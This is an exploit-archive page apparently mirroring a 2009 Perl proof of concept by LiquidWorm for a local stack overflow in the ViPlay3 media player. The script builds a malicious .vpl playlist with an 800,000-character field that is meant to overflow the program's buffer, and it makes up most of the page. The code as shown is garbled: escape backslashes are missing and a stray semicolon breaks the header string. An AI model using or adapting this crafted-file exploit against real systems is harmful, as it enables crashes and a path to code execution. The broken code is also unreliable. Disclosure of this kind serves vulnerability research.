ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC
# Published : 2009-05-08
# Author : LiquidWorm
# Previous Title : TYPSoft FTP Server 1.11 (ABORT) Remote DoS Exploit
# Next Title : Mortbay Jetty <= 7.0.0-pre5 Dispatcher Servlet Denial of Service Exploit

#/usr/bin/perl
#
# ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC
#
# Product web page: http://www.urusoft.net/
# Tested on Microsoft Windows XP Professional SP3 (English)
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# http://www.zeroscience.org/
# 08.05.2009

$b= "[General]rn".
    "Title=Proof of Conceptrn".
    "Author=LiquidWormrn".
    "Comments=2009rn".
    "Version=1.0rn".
    "[Files]rn";
    "Count=800000rn".
    "LastPlayed=0rn";
$c= "1=" . "A" x 800000 . "rn";
open a, ">./lqwrm.vpl";
print a $b.$c;
close a;
print "n- Done!n";

# www.Syue.com [2009-05-08]